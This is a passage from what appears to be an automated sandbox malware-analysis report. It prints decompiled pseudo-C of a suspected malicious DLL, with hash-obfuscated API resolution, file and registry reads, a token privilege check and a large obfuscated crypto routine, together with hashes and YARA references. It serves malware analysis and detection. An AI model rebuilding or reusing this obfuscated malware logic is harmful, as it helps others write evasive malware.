				} else {
					asm("stosd");
					asm("stosd");
					if(E6FC52F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6fc55d80
0x6fc55d81
0x6fc55d83
0x6fc55d89
0x6fc55d8b
0x6fc55d8f
0x6fc55d8f
0x6fc55d93
0x6fc55d9f
0x6fc55dd3
0x6fc55dd3
0x00000000
0x6fc55da1
0x6fc55da6
0x6fc55da7
0x6fc55dbb
0x6fc55dcc
0x6fc55dbd
0x6fc55dc8
0x6fc55dc8
0x6fc55dd1
0x6fc55dd9
0x6fc55ddb
0x6fc55dde
0x6fc55de3
0x6fc55de3
0x6fc55de7
0x6fc55dec
0x00000000
0x00000000
0x00000000
0x6fc55dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,6FC55CB4,?,?), ref: 6FC55DC8

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: 0c1bda60b6b1ac38377dc10dec5b6fcc411e94cbb61ae4bee6d76fe91f487f6c
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: 55F02D33B0971169D3545A3C9D44BDB77E5EFD1718F204F2EF590A6190F760E4744198

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FC55DF0(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6FC4C33C(_t19) == 0) {
					_v12 = _a8;
					if(E6FC52F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6FC5352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6fc55df3
0x6fc55df5
0x6fc55e01
0x6fc55e0b
0x6fc55e21
0x6fc55e40
0x6fc55e23
0x6fc55e34
0x6fc55e38
0x6fc55e58
0x6fc55e3a
0x6fc55e3a
0x6fc55e3a
0x6fc55e38
0x6fc55e41
0x6fc55e46
0x6fc55e4f
0x6fc55e48
0x6fc55e48
0x6fc55e4a
0x6fc55e4a
0x6fc55e03
0x6fc55e03
0x6fc55e03
0x6fc55e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,6FC55CE5,00000000,?,00000000,?), ref: 6FC55E34

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: bfda1c979c2bd94b7274aa3309dac4ff8dd926f1144d3fd7cb970d6ddb7a5254
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: 5BF0A431248322AEDB109B3DCE40AAB77D5BF45248F104D2AB8A9D2151FB75E4388729

Uniqueness

Uniqueness Score: -1.00%

Function 6FC555B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FC555B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6FC52F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6FC4E6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6fc555c2
0x6fc555c4
0x6fc555cb
0x6fc555cd
0x6fc555d1
0x6fc555d3
0x6fc555d6
0x6fc555d9
0x6fc555d9
0x6fc555f3
0x00000000
0x00000000
0x6fc55604
0x6fc55608
0x00000000
0x00000000
0x6fc55616
0x6fc55619
0x6fc5561e
0x6fc55623
0x6fc55623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 6FC55604

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: 1e3a075029700449bc1bfef0f150031d98f2981f0aa1c5b3777583adabf19435
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: FCF0AFB56007096EE7249F1EDC44CB7BBEDEBC0B18F00891EB0D543240EE31A8248AA4

Uniqueness

Uniqueness Score: -1.00%

Function 6FC510CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6FC510CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6FC52F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6FC52F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6fc510da
0x6fc510dc
0x6fc510ea
0x6fc510ee
0x6fc51137
0x00000000
0x6fc51137
0x6fc510f3
0x6fc510f4
0x6fc510f6
0x6fc510fb
0x00000000
0x6fc51114
0x6fc51118
0x6fc51125
0x6fc51129
0x00000000
0x00000000
0x00000000
0x6fc51132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 6FC51125

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: 2f17dddc3166feeb5b26f254ee97473e77a5cd5f0e83617349f2afd6b05e0c1c
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: D4F0A9B47043866BFF04A9289C18FBB22ED5BC1604F00C869B550DA188FB78D8399325

Uniqueness

Uniqueness Score: -1.00%

Function 6FC53564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E6FC53564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x6fc5d228 == 0xcd845700) {
					_t8 = E6FC52F8C(0xa5eabdf8, 0xd926c223);
					 *0x6fc5d22c = E6FC52F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x6fc5d228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x6fc5d228 = 0;
					}
				}
				_t3 = E6FC52F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x6fc5d228);
					asm("int3");
					return _t3;
				}
			}

0x6fc5356c
0x6fc53574
0x6fc535a7
0x6fc535b8
0x6fc535c3
0x6fc535ce
0x6fc535d0
0x6fc535d0
0x6fc535c3
0x6fc53580
0x6fc53587
0x6fc53597
0x6fc53589
0x6fc53589
0x6fc5358a
0x6fc5358c
0x6fc5358e
0x6fc5358f
0x6fc5358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,6FC4DEB9,?,?), ref: 6FC535CE

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 2e246e896a25dac9aaf5504ebfbbfc38660a3c5f3916ee1900e194a205460515
Instruction ID: 7f30dbe2526644fc17d7a4ee266ce1e8175823b5cf571e10e4100a6f791bc5e8
Opcode Fuzzy Hash: 2e246e896a25dac9aaf5504ebfbbfc38660a3c5f3916ee1900e194a205460515
Instruction Fuzzy Hash: 37F0AE7360C311BDD3115B767C05D56BED9EFC561ABD08429B654EA080F7148874D62A

Uniqueness

Uniqueness Score: -1.00%

Function 033F1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 033F1EA8

Memory Dump Source

Source File: 00000002.00000002.1042515814.00000000033F0000.00000040.00000001.sdmp, Offset: 033F0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: 2b1335dd79567a4c5b5dfb02e4903a2ebd11da63713405e89b7853fbe6aa4f2e
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: A441C0B5E0521ACFDB08DFA8D4906AEBBF1BF48714F19852EE548AB350D735A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6FC49144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E6FC49144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E6FC52F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E6FC4F620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E6FC4F620( &_v472, 0);
				_v528 = 0;
				E6FC4F620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E6FC4F8C4( &_v528, E6FC4F568( &_v528) + 0x10);
				E6FC4F558( &_v532, E6FC4F568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E6FC4F8C4( &_v536, E6FC4F568( &_v536) + 0x10);
				E6FC4F558( &_v540, E6FC4F568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E6FC4F8C4( &_v544, E6FC4F568( &_v544) + 0x10);
				E6FC4F558( &_v548, E6FC4F568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E6FC4F8C4( &_v552, E6FC4F568( &_v552) + 0x10);
				E6FC4F558( &_v556, E6FC4F568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E6FC4F8C4( &_v560, E6FC4F568( &_v560) + 0x10);
				E6FC4F558( &_v564, E6FC4F568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E6FC4F8C4( &_v568, E6FC4F568( &_v568) + 0x10);
				E6FC4F558( &_v572, E6FC4F568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E6FC5413C(0xa5eabdf8, _t953);
				E6FC4F558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E6FC4F558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E6FC4F558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E6FC4F558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E6FC4F558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E6FC4F558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E6FC4ADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E6FC4B338( &_v308, _t951, __eflags, _t889, _t931);
					E6FC4F8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v516, E6FC4F568( &_v516) + 0x10);
					E6FC4F558( &_v520, E6FC4F568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v524, E6FC4F568( &_v524) + 0x10);
					E6FC4F558( &_v528, E6FC4F568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v532, E6FC4F568( &_v532) + 0x10);
					E6FC4F558( &_v536, E6FC4F568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E6FC4BAB8( &_v340, __eflags);
					E6FC4F558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E6FC4F558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E6FC4F558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E6FC4F620( &_v396, 0);
					E6FC4F620( &_v416, 0);
					_push(0);
					_push( *0x6fc5b7c4);
					E6FC520A4(__eflags,  &_v100);
					E6FC4F75C( &_v416, __eflags);
					E6FC4E054( &_v100);
					E6FC4F8C4( &_v436, E6FC4F744( &_v420,  &_v100));
					_t437 = E6FC4F558( &_v424, 0);
					E6FC47970(_t951, _t437, E6FC4F558( &_v444, 0), _v112);
					_t442 = E6FC4F568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E6FC4B0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E6FC4B0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E6FC4F6F0( &_v380);
						E6FC4F6F0( &_v364);
						E6FC4F6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E6FC535D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E6FC4CDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E6FC4B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E6FC4F568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E6FC4F568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E6FC53C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E6FC4F8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v564, E6FC4F568( &_v564) + 0x10);
					E6FC4F558( &_v568, E6FC4F568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v572, E6FC4F568( &_v572) + 0x10);
					E6FC4F558( &_v576, E6FC4F568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v580, E6FC4F568( &_v580) + 0x10);
					E6FC4F558( &_v584, E6FC4F568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v588, E6FC4F568( &_v588) + 0x10);
					E6FC4F558( &_v592, E6FC4F568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v596, E6FC4F568( &_v596) + 0x10);
					E6FC4F558( &_v600, E6FC4F568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v604, E6FC4F568( &_v604) + 0x10);
					E6FC4F558( &_v608, E6FC4F568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v612, E6FC4F568( &_v612) + 0x10);
					E6FC4F558( &_v616, E6FC4F568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E6FC4F8C4( &_v620, E6FC4F568( &_v620) + 0x10);
					E6FC4F558( &_v624, E6FC4F568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E6FC5413C(0xa5eabdf8, _t857);
					E6FC4F558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E6FC4F558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E6FC4F558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E6FC4F558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E6FC4F558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E6FC4F558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E6FC4F558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E6FC4F558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E6FC4A5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E6FC4B608(_t955 + 0xbc);
						E6FC4CDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E6FC4AD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E6FC4A5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E6FC4A298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
